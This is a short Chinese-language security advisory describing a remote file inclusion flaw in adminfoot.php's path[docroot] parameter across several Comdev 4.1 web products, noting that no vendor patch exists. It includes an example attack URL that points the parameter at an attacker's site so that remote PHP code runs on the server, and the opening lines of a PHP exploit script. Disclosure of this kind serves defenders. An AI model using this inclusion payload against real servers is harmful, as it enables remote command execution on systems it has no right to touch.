Comdev是一家软件开发公司,提供多种商业Web组件。
多个Comdev产品在处理用户请求时存在输入验证漏洞,远程攻击者可能利用漏洞在服务器上以Web进程权限执行任意命令。
多个Comdev产品的adminfoot.php脚本没有正确过滤对path[docroot]参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。成功攻击要求打开了register_globals。
Comdev Web Blogger 4.1
Comdev One Admin Pro 4.1
Comdev Misc Tools 4.1
Comdev Forum 4.1
Comdev Form Designer 4.1
临时解决方法:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.example.com//<path>/oneadmin/adminfoot.php?path[docroot]=http://attacker's site
#!/usr/bin/php
/*********************************************************************
* Comdev One Admin 4.1 Remote